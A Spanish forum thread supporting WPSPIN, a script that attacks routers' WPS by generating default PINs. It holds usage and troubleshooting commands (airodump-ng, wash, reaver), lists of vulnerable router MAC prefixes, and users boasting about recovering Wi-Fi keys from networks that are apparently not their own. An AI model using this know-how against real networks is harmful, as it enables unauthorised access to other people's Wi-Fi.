Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: EPDPF en Marzo 15, 2013, 18:54:10 pm
Muchas gracias por el aporte tio, menudo curro que te has pegado, si necesitas ayuda para testear aquí me tienes para lo que sea ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: neow1 en Marzo 29, 2013, 21:54:25 pm
Hola, tengo un pequeño problema.
Cuando pongo el pin 12345670 para cualquier red de esta mac F4:3E:61:XX:XX:XX
Se me queda atrancado en Enviando respuesta de identidad. Alguna solución?
Gracias de antemano y muy buen aporte.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Marzo 29, 2013, 22:16:09 pm
Las razones pueden ser multiples:
problema de distancia/calidad de señal - chipset - clientes conectados - espaciar los diferentes tipos de delay - WPS no activado (verfificar con wash) - versión de reaver - estas conectado con tu wlan etc...
Tienes que dar más detalles, el nivel de RXQ y PWR, si hay clientes conectados, el resultado de wash etc...
El problema es más bien externo al script y esta en la fase reaver.
De momento lo dejamos aquí y lo moveremos en un hilo apropiado más adelante
Par peroporcionar la informaciuón relevante:
resultado de

1)
Código: [Seleccionar]
airmon-ng

2)
Código: [Seleccionar]
airodump-ng --bssid mac_ojectivo --channel nºcanal <interfaz>ejemplo
Código: [Seleccionar]
airodump-ng --bssid 00:12:34:56:78:99 --channel 6 mon0
3)
Código: [Seleccionar]
wash -i <interfaz> -b <mac_de_mi_routeur> -C -c <canl de mi routeur>ejemplo
Código: [Seleccionar]
wash -i mon0 -b 00:12:34:56:78:99  --channel 6 mon0
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: managuas en Marzo 29, 2013, 22:28:07 pm
Hola, tengo un pequeño problema.
Cuando pongo el pin 12345670 para cualquier red de esta mac F4:3E:61:XX:XX:XX
Se me queda atrancado en Enviando respuesta de identidad. Alguna solución?
Gracias de antemano y muy buen aporte.
esa mac es distribuida por varios operadores entre ellos si no me equivoco movistar vodafone R_wlan y alguno mas y no creo que todos compartan el mismo pin
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: neow1 en Marzo 29, 2013, 22:32:58 pm
Muchas gracias, ya lo he solucionado. Lo he probado con otra tarjeta de red y esta vez me ha salido era una WLAN_XXXX y el pin era ese.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Marzo 29, 2013, 22:42:04 pm
Enhorrabuena
Podrías decirnos con cual chipset te ha fallado y con cual lo has conseguido, puede ser intersante a saber  ;)

Citar
esa mac es distribuida por varios operadores entre ellos si no me equivoco movistar vodafone R_wlan y alguno mas y no creo que todos compartan el mismo pin

NI idea... Si tienes o consigues algo de información más concreta sería interesante saber algo para anotar en el full disclosure. Y si esta soportado como essid por defecto soportado   ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: managuas en Marzo 30, 2013, 14:35:32 pm
kcdtv  si tubiese datos de esos. te los haria llegar esa mac F4:3E:61 es muy comun y lo fabrica la misma empresa.solo que los ditribuyen muchos operadores. e intentado conectarme mediate pin a vodafone y R_wlan con WPS activado con ese pin y nada. de ahi mi duda.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: gamer669 en Abril 03, 2013, 03:53:21 am
bueno pues yo estoy peleando contra un technicolor tg582n desde hace 3 dias y no me deja, intentare con esto a ver q sucede... abra algo mas ya sobre este tipo de modems?

por cierto, llevo dias leyendolos y son geniales, e decidido ser miembro activo de este foro :)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Abril 03, 2013, 20:15:04 pm
Me suena a que tienen el sistema de bloqueo incorporado... pero no disponemos para poder asegurar algo
mirra con wash si esta bien abierto.
este tipo de información esta agrupada en nuestro hilo sobre patrones de PIN WPA cuando se sabe algo con certeza.
 
 
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: neow1 en Mayo 14, 2013, 15:13:10 pm
Enhorrabuena
Podrías decirnos con cual chipset te ha fallado y con cual lo has conseguido, puede ser intersante a saber  ;)

Hola, siento contestarte un mes y medio después. Tenia trabajo y no me metía, con la que me daba el fallo era un TP-LINK WN722N (ar9271) y con el que he conseguido fue un portátil viejo de un amigo, no me acuerdo que chipset era pero estoy casi seguro que era un Broadcom. Cuando pueda lo posteo aquí.
Un saludo y gracias.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Mayo 14, 2013, 15:57:39 pm
jeje... por lo menos significa que tienes mas tiempo libre  ;)
pues ya nos diras que chipset, es interesante porque los broadcom no se llevan muy buena fama (demasiados chipset están mal soportados por aircrack-ng) pero si podemos darles uso a estos chipsets para revaer  :)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: neow1 en Mayo 14, 2013, 16:07:04 pm
Pues ese wifi del portátil es muy potente, la pena es que el portátil esta hecho mierda, tendrá sus 10 años mínimo, a la hora se calienta, empieza a ir lento y adiós. Y si te digo la verdad, he sacado muchas claves con el reaver.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: mandovel en Mayo 14, 2013, 17:20:02 pm
ooo que pena de portátil  jajaja échale pasta térmica pa que no se te caliente tanto si tan potente es el wifi mira haber que chip tiene míralo con el everest
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: neow1 en Mayo 14, 2013, 17:30:25 pm
Everest, imposible el portátil si mal no recuerdo no tiene el sistema operativo instalado, la única manera de mirarlo es con live cd que utilizo para auditar, tampoco me reconoce los usb, lo único que puedo hacer es cargar el móvil y ya ni eso por que no le da suficiente corriente como para cargarlo xD.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: neow1 en Mayo 15, 2013, 19:57:07 pm
Buenas, como tal decia anteriormente era un Broadcom b43 por lo menos es lo que me sale en aircrack-ng al ponerlo. Espero que os sirva de algo.
Un saludo.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Mayo 31, 2013, 21:07:03 pm
NUEVA VERSIÖN DISPONIBLE; LINK ACTUALIZADO

Algo de novedades para esta entrega  :)

Nada menos que 9 modelos soprtados, 16 nuevos bssid para vodfaone conocidos.

  Respecto a WPSPIN àra linux notareís bastantes cambios en la interfaz y la integración de un modo guiado además del mdo PIN generador como antes.
 
  visitemos un poco el nuevo WPSPIN

  Como siempre descomprimir el archivo , abrir un terminal en la carpeta descomprimida y lanzar el script con

Código: [Seleccionar]
bash WPSPIN.sh
  Si usaís una cuenta de usuario normal, no root, entrar vuestro pass cuando se lo pide.

  El script empieza con un menú idioma, 2 para español

  (http://storage8.static.itmages.com/i/13/0531/h_1370023651_6887984_8a54320bc9.png)

 opción 1 es el modo guiado nuevo, el dos sería lo que era wpspin antes, entrando los datos a mano

  (http://storage6.static.itmages.com/i/13/0531/h_1370023803_4767410_0df5bcf430.png)

 si tenéis un solo adaptador WPSPIN se encarga del manejo de la interfaz y se lanza directamente el scan

  (http://storage4.static.itmages.com/i/13/0531/h_1370024394_2896116_41adfea2cb.png)

se abre otro terminal con wash, una vez que esteís satisfechos con el escaneo, cerrar la ventana wash y se mostraran los objetivos enseñando en pantalla el PIN por defecto.
Si es verde significa que esta soportado, si es naranja es que esta desconocido - no soportado.

(http://storage1.static.itmages.com/i/13/0531/h_1370024673_5256287_9005f59303.png)


seleccionamos nuestro objetivo y vemos los detalles en pantalla así que un menú que nos propone atacar el objetivo (opción1)

(http://storage7.static.itmages.com/i/13/0531/h_1370024950_1264464_413e28d469.png)

el ataque inicia  y si se encuentra la llave se guarda en un fichero llamado con el nombre de su red en la carpeta wpspin

(http://storage5.static.itmages.com/i/13/0531/h_1370025326_1239188_318677fb57.png)


si tenemos varias interfaces podemos elegir cual queremos desde el menu anterior

(http://storage8.static.itmages.com/i/13/0531/h_1370025677_6080233_9f3743121c.png)

El script a sido probado en éxito sobre

Xubuntu
Lubuntu
Ubuntu
Kubuntu
Linux Mint

de momento en kali no, mirare este tema mas adelante.
se esperan unos fallos, gracias por reportarlos  ;D





 
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: betis-jesus en Mayo 31, 2013, 21:14:35 pm
enhorabuena por la compleja de este scritp espero que la gente de linux sepa valorarlo con el consiguiente trabajo y esfuerzo que a necesitado para llega a esta nueva version
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Mayo 31, 2013, 21:39:06 pm
gracias betis,no es gran cosa pero el montón de trabjo que requiere... ahora entiendo mejorlo que significa hacer lo que haces, hay que tener nervios porque a veces   (http://portalhacker.net/Smileys/classic/secalento.gif)
enhorabuena también para las novedades de tu lado y decir que es siguiendo tus consejos y mirando tu trabajo que he enfocado  esta versión (scan con display live, codigo de colores para indicar los AP soportados)
Realmente de algun modo podemos decir he adaptado la parte scan de tu herramienta en bash.  ;D
 
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: betis-jesus en Mayo 31, 2013, 21:46:08 pm
en realidad la forma con la que los a programado incluido tipo de variable for ect son muy similares la diferencia esta en como cada uno llamamos y estructuramos el codigo en realidad vemos pensado casi iguale en la forma de hacer la misma cosa.

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: carasucia en Mayo 31, 2013, 21:56:14 pm
Perdona pero no encuentro el link de descarga
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: 1camaron1 en Mayo 31, 2013, 21:58:13 pm
enhorabuena por la compleja de este scritp espero que la gente de linux sepa valorarlo con el consiguiente trabajo y esfuerzo que a necesitado para llega a esta nueva version
Suscribo las palabras de betis :)
También añadir que este es el tool más actualizado y moderno a día de hoy, quien sepa valorarlo de verdad disfrutará muchísimo con el script, con el manejo, por su eficaz resultado.
Sólo tengo palabras buenas respecto a este trabajo :)
Enhorabuena!! :) :)

Citar
Advertencia - mientras estabas leyendo, una nueva respuesta fue publicada. Probablemente desees revisar tu mensaje
:)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Mayo 31, 2013, 22:01:18 pm
Para descargar es en fin del primer post  ;)

(http://storage2.static.itmages.com/i/13/0601/h_1370030400_8891316_0a8886ada0.png)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Coeman76 en Mayo 31, 2013, 22:02:51 pm
Gracias kdctv por este peazo script!!

Muy original lo de hacerlo internacional  ;)

Un saludo
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Mayo 31, 2013, 22:07:30 pm
Gracias a ti por la idea de usar de Xterm y por tu tiempo para las pruebas  ;)
Además que te pedí ayuda a las ultimas y de tu lado estabas haciendo este pedazo de handhsaker, ( suena a fiesta con cocktailes )  ;D

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: carasucia en Mayo 31, 2013, 22:09:20 pm
Para descargar es en fin del primer post  ;)

(http://storage2.static.itmages.com/i/13/0601/h_1370030400_8891316_0a8886ada0.png)
Perdona,tienes razón.Ha sido un fallo mio.Gracias otra vez por el trabajo.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: dosariland en Mayo 31, 2013, 22:40:53 pm
Pues a probarlo se ha dicho!! Y como siempre cada vez mas fáciles de usar las herramientas!!!! Saludos a todos :D

 
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: larata29 en Mayo 31, 2013, 22:42:25 pm
Enhorabuena por el script...os vais superando...descargando y probando....Aupa!!
 
Un saludo
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: lolo011 en Junio 01, 2013, 01:12:53 am
no tiene soporte para ls orange-xxxx
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Junio 01, 2013, 02:16:05 am
Es que a mi conocimiento con wps sobre orange-xxxx no hay nada
¿O es que me he perdido algo  ???
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: yayo en Junio 01, 2013, 12:54:54 pm
ayuda: entro al programa le doy al 2 osea español y luego al 1 escaneo con wash o algo asi dejo un minuto o mas le doy a control c para pararlo y elegir la red que este en verde o naranja y no me aparecen ninguna y dice una frase algo mas o menos no se genero el archivo o algo asi....si quieres que sea mas concreto le saco una foto mañana. :)
gracias....
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Junio 01, 2013, 13:29:28 pm
Si, se necesitan mas elementos y precisión. Mejor que una captura o foto haces un copiado pegado de todo lo que pasa en consola y
indicas que distribución uzas.
Si tienes el script en un stick USB, ponlo en tu  escritorio o carpeta personal por si tu stick esta de un modo protegido contra escritura o montado sin los derechos sufficient4es.
y mejor dejes bel script en su carpeta tal cual lo tienes una vez descomprimido, mueves la carpeta si lo mueves
le entata de wash o walsh es mejor cerrarla con el mouse pero ahi no esta el problema y es que no se ha creado el archivo de san.
Cuando lanzas el 1, y que empieza el scan; ¿ ves las redes en la segunda ventana o nada?
El script va asi, te deja ver en vivo lo que esta averiguando wash en una ventana segundaría, cuando estas satisfecho lo parras y en la ventana principal ponen los objetivos escaneado con el PIN por defecto (verde si soportado)
si no aparece nada el problema esta al momento de llamar wash, si aparecen los datos wash en la ventana el problema esta al guardar los datos.
Podría también ser un problema de mode monitor y chipset, ¿Me podrás decir cual chipset usas?
Muchas gracias por probar y tomar el tiempo de reportar fallos  :)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: FARRUKO en Junio 01, 2013, 14:14:00 pm
Nada, que no me detecta interfaces.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: lolo011 en Junio 01, 2013, 14:15:10 pm
Es que a mi conocimiento con wps sobre orange-xxxx no hay nada
¿O es que me he perdido algo  ???

no hay nada ¿no?  ::)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Junio 01, 2013, 16:05:56 pm
A parte de decirte que son extradamente dificiles de pelar porque suelen  llevar el bloqueo WPS muy, muy largo, algo como 20 horas, yo no le vi forma de contornar este bloqueo que es muy básica y cuenta las peticiones echas, no le importa que hayas cqambiadfo la mac, no le importa que no se haya echo bien la transacción:
un intento es un tiento y después unos cuantos se bloquea.
si nes asi tienes un mensage en reaver
"AP rate limit detected"

y también en  wash veras aparecer un YES en la columna lock
En WPSPIN lo ves así con "no" en rojo en la columna "abierto"
Al revés comparado a lo que propone wash en inglès : locked es cerrado pero me parecía mas lógico "si" para abierto que significa si se puede atacar; y "no" en abierto que significa no se puede atacar

(http://i.imm.io/17UEv.png)


como ves, PIN naranja para las orange : es para redes desconocidas o no soportadas,
Y estas tienen el wps bloqueado, para que veas como sale, en rojo "No" hasta que no tienes un Si en abierto como para las demás redes no sirve de nada intentar algo con wps
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: 1camaron1 en Junio 01, 2013, 19:42:09 pm
le doy a control c para pararlo y elegir la red que este en verde o naranja y no me aparecen ninguna y dice una frase algo mas o menos no se genero el archivo o algo asi.
Creo que te refieres a los archivos txt que genera el script, entre ellos: wash_scan.txt,  logueate como root y prueba de nuevo :)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Junio 01, 2013, 19:58:49 pm
FARRUKO, , para poder hacer algo necesito saber primero la distribución que usas. y que hagas un copiado-pegado de lo que pasa en consola.
El script usa iwconfig y airmon-ng para detectar las interfaces, nada nuevo
Si estas en el menú reducido elige "redetectar interfaz".
Si estas en live: asegúrate de bien tener la carpeta en el Escritorio
Si estas en maquina virtual , las tarjetas internas no funcionan

Código: [Seleccionar]
cat /proc/version

para los detalles sobre la versión que usas
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: FARRUKO en Junio 01, 2013, 21:00:04 pm
Es que no hay soporte para esta distribución FARRUKO.  ;)

NORMAS

Te invito a borrar el nombre de la distribución.

Gracias por colaborar pero no uso estas lives y además no se brinda soporte  nada se hará al respecto
Puedes probar quitar los "sudo" del script y es muy probable que rule más o menos correctamente.
Se siente y edita tu post para cuando pase lampi con la escoba ;)
OK ;D ;D pero es raro puesto que me funcionan todos los demás scripts... ::) ::)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: cristi_28 en Junio 01, 2013, 21:06:17 pm
probado en kali y funciona bien
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Junio 01, 2013, 21:19:17 pm
Es que se llaman script por la forma que llevan, sin mouse etc pero no son "scipts". O son compilados y instalados o son módulos.
Luego tienes la diferencia entre distribuciones,ligeras pero que hacen que unas cosas no rulen del todo, hay que buscar la sintaxis que funcione en lo mas posible
Concretamente la mayoría de las distribuciones se basan en debian y este script esta echo sobre debian y para estas distribuciones debería ir bien.
las lives que gastan módulos no están basadas en debian pero en slackware y no se que más.
Para los detalles, Slackware es una de las primeras distribuciones echas en linux, llevada por un hombre, debian es mas recién y es un proyecto colectivo
Las live que usan módulos dependen de que la gente hagan módulos asi que generalmente tienes un modulo para fácilmente hacer módulos.

Muchas gracias cristi_28, no había probado en kali  :)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: lolo011 en Junio 01, 2013, 23:42:01 pm
kcdtv es cierto ls orange-xxxx son dificiles de romper tienen una def extraodinaria el router se bloquea automaticamente a ls 10 intentos (WARNING:AP rate limit detected) y no hay manera de heacerl reiniciar tiene que ser el dueño  8)

ademas al bloquearse no tiene tiempo fijo osea puede tardar 1h o 24 horas o una semana o para siempre.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: dakarpesca en Junio 02, 2013, 00:11:40 am
hola al poner sh wpspin.sh en backtrack 5 r3 me sale este error
wpspin.sh: line 575: syntax error near unexpected token `<'
wpspin.sh: line 575: `      done < <( cat /tmp/Interface.txt | awk -F' ' '{ print $2 }')           # we grap the second field with awk to fill the array for total interface'
nesecito ayuda por favor y un saludo
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: 1camaron1 en Junio 02, 2013, 12:29:13 pm
hola al poner sh wpspin.sh
¿Te has leído el primer hilo de este post? si lo fueras hecho verías que el script se ejecuta como:  bash WPSPIN.sh
si lo llamas como: sh wpspin.sh no te va a funcionar.
Saludos :)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: ZiFFeL en Junio 05, 2013, 14:33:09 pm
Hola, en el modo guiado no me llega a mostrar ninguna red, pero si hago el segundo modo todo perfecto, qué puede suceder?
Un saludo y buen trabajo.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: 1camaron1 en Junio 05, 2013, 15:54:16 pm
Has probado ejecutar el script como root?
Saludos
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kkaka en Junio 05, 2013, 17:25:51 pm
a me tampoco no me muestra las redes, cuando lanzo el 1, y que empieza el escaneo, veo las redes en la segunda ventana. pero cuando lo paro en la ventana principal no me muestra ninguna red
a cambio con el script de Coeman76 ( Handshaker v1.0 ) va perfecto.
todo eso en la misma distribución. el script ejecutado como root.
un saludo
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: 1camaron1 en Junio 05, 2013, 17:59:04 pm
Te da algún error? estaría bien que hicieras un copy-paste de lo que sucede en tu consola
Saludos
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Junio 05, 2013, 18:07:13 pm
Si tienes el script en un stick, pon la carpeta en el escriotrio

ZiFFel y Kakkaes, gracias por probar, es  necesario que ponéis un copiado pegado y que indiquéis que versión de linux usáis,
Con los sistemas que tengo obviamente va bien, si no me ponéis un copiado pegado bde todo lo que pasa en consola, desde la orden para lanzar el script hasta el fallo,¿ como queréis que haga-averigue  algo?  :D



Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: ZiFFeL en Junio 05, 2013, 18:39:45 pm
No lo lanzo como root, pero el propio script me obliga a ello en un paso posterior, he estado viendo el código y cuando ejecuta el wash, lo hace con el "sudo" delante, por lo que no entiendo cual será el motivo ya que el adaptador si que lo pone en modo monitor.

Uso linux mint, si necesitáis más datos/pruebas, decidlo.
Ahora mismo no tengo más adaptadores que un atheros por lo que no se si será ese el problema, pero si ejecuto por mi cuenta en otro terminal la orden wash lo hace sin problemas...

Saludos y gracias.

PD: http://hostr.co/2Lis5Tg13OoT
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Junio 05, 2013, 19:00:18 pm
necesito un copiado pegado desde el orden que lanza el script hasta el final, todo lo que pasa en consola  ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: SkyWatcher en Junio 05, 2013, 22:09:27 pm
Off-topic

Yo llevo tiempo queriendo ponerme alguna distro de linux, pero no se porque motivo no me deja instalarlas, y eso que he probado con 2 pcs distintos. Se queda en negro la pantalla cuando intento instalar desde el usb y asi se queda..

Lo raro es que con un live-cd si que me deja usarlo, pero sin instalarlo..
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: ZiFFeL en Junio 06, 2013, 00:53:29 am
He revisado lo que ponía por consola, no tenía xterm instalado, lo he instalado y a la primera, va muy bien :)
Saludos
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: 1camaron1 en Junio 06, 2013, 10:28:22 am
Me alegro :)
igual hay que añadir una función para detectar la presencia de xterm... cuando venga kcdtv él dirá :)
Saludos.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: ZiFFeL en Junio 06, 2013, 11:04:36 am
O al menos ponerlo en el primer post, para que la gente lo sepa :)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: 1camaron1 en Junio 06, 2013, 12:27:29 pm
Es raro... porque xterm por defecto ya viene instalado en la mayoría de distros.
Saludos :)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Coeman76 en Junio 06, 2013, 13:38:55 pm
Es raro... porque xterm por defecto ya viene instalado en la mayoría de distros.
Saludos :)

Si que es raro sí....xterm me ha venido en todas las distros que tengo por aqui....pero acabo de probarlo en linux-mint que creo que es la de ZiFFeL y no viene por defecto xterm  :o :o :o :o
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Junio 06, 2013, 14:57:21 pm
muchas gracias ZiFFel, veré lo que puedo hacer, o cambiar otra vez y buscar otra solución sin xterm o poner una función para verfificar que xterm sea instalado.
De momento lo voy a señalarlo en el primer post
Cuando tendré un momento mirare para hacer un filtro y un instalador.

Lo probe en un linux mint y me funciono pero es muy probable que lo haya instalado  :P ... Hace tiempo que me lo instale en un viejo portátil y no me recuerdo de lo que he hecho.

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Junio 07, 2013, 06:31:54 am
Te repito lo que te dije antes
1> Lo que hace falta es un copiado-pegado entero de loi que pasa en consola, no captyras de pantalla, ya que falta todo lo intersante que esta justamente entre las caruras de pantalla
2> ¿Que distribución es?
Si no me dan esta información (no es muy complicado creo, no puedo hacer nada)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: atim en Junio 18, 2013, 20:18:22 pm
Buenas;

Probado con WLAN_XXXX   A4:52:6F  y funcionando 100%

He mirado en la lista y no he visto esta mac, por eso la pongo para confirmar que es vulnerable.

Edito: Si que esta en la lista
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Junio 18, 2013, 21:27:29 pm
Citar
A4:52:6F
atim, este BSSID está en la lista como genérico que es otro tema aunque WPSPIN de soporte también a este tipo de PIN

full disclosure nº6

Fabricante >   ADB-Broadband
essid      >   WLAN_XXXX
modelo     >   PDG-A4001N
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: atim en Junio 18, 2013, 21:32:21 pm
Citar
está en la lista como genérico
Gracias maripuri por la aclaración.   ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Junio 18, 2013, 21:43:14 pm
atím, no hay de que..  aún resulta un poco "embrollo" todo esto, el tema pasa por diferenciar dos tipos de PIN:

a)  El que resulta de la vulneravilidad de la que se aprovecha WPSPIN como generador de PIN por defecto que pertenece a un router / BSSID en concreto y que no es "transferible" a otro router con mismo comienzo de BSSID (en otras palabras no es genérico sino único para dicho router)

b)  El PIN genérico que aunque es soportado igualmente por WPSPIN sirve para todos los router de un modelo concreto, es decir es un PIN genérico (tal cual la propia palabra lo dice) porque no solo un router lo usa sino todos los de ese modelo en concreto.

Una vez familiarizad@s con esto ya resulta mas fácil de comprender.

Salu2
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: gorrion333 en Junio 18, 2013, 23:27:56 pm
hola buenas me topado con una de estas desde trebujena,cadiz..
vodafoneF4E2     mac: 72:7s:5e   el primer pin que da es el correcto.
creo que no esta en las soportadas.un saludo.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: SkyWatcher en Junio 18, 2013, 23:35:30 pm
hola buenas me topado con una de estas desde trebujena,cadiz..
vodafoneF4E2     mac: 72:7s:5e   el primer pin que da es el correcto.
creo que no esta en las soportadas.un saludo.

Supongo que te refieres a "72:7D:5E" ya que las mac se componen solo de numeros hexadecimales, y si esta en la lista.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: gorrion333 en Junio 18, 2013, 23:45:49 pm
tienes razon amigo.fallo mio.lo siento.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Dj-van en Junio 19, 2013, 00:10:10 am
 Justo me pasa lo mismo que kkaka. En vez de hacer un copiado-pegado, te lo describo con detalles.

 Ejecuto: bash WPSPIN.sh

  Selecciono opción 2 Espagnuolo  ;D

 Me detecta my Realtek rtl8187l en la opción 1. Pincho.

 Me la pone en modo monitor. Ahora elijo modo guiado. Usea 1.

 Aparece otra ventana pequeña con airodump, escaneando las redes. En la ventana principal, aparece la info comentando el tema de las redes con diferentes colores, resumiendo si son compatibles o no. Y la opción de cerrar ventana de escaneo para elegir una red.

 Cierro ventana y aparece una nueva en la que se supone deben salir las redes filtradas y coloreadas idem que numeradas para atacar, pero no aparece ninguna. Y lo gracioso de todo es que nos dice que pulsemos una red para atacar.

  Y nosale naaaaa.  :'(

 Así que kkaka no es el único. Estoy como root operando desde un Linux Slax.

 Tambien decir que tengo xterm instalado. Cuando lo ejecuto, se me abre una nueva ventana, como otro tipo de
consola. Vuelvo a ejecutar el script y sigue a lo suyo.

 Veamos que puede ser. Saludoschau.

 Me edito fraudulentamente: Lo probaré con Backtrack 5 y comentaré resultado.
 
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Junio 19, 2013, 01:18:26 am
el copiado pegado es necesario  ;)  para tener los mensajes de errores que pasan  entre screen ya que si me cuentes esto como kakka solo veo los screns.
tu descripción no me ayuda  ;D, por muy detallada, es mas rápido y es lo único que necesito, es un copiado pegado entero de todo lo que pasa en consola.
 ;D es mas simple que escribir tanto y es lo que necesito....  :P
Slax existe aún?  :P  A ver, creo que simplemente es necesario el paquete  sudo ya que esto es muy "debian"
más no les puedo decir ni hacer nada al respecto hasta que tu o kakka me pasáis un copiado-pegado
saludos
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Dj-van en Junio 19, 2013, 20:06:42 pm

 Perdona kcdtv. De momento ni copio ni pego. Probado con Backtrack 5 y funcionando perfectamente. Muy buen trabajo compañero. Estoy escribiendo desde el Backtrack este mensaje. Tenías razón. Debian, supongo, debe ser
 la clave.

 Seguir currando así. Esta web es grande y poderosa gracias a vosotros.  ;)

 Saluuuuuudoschau.

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: cristi_28 en Junio 19, 2013, 20:52:36 pm
pues yo lo estoy ejecutando en kali y todo perfecto
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: 1camaron1 en Junio 19, 2013, 22:39:39 pm
eso es bueno :)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Junio 21, 2013, 11:36:14 am
Citar
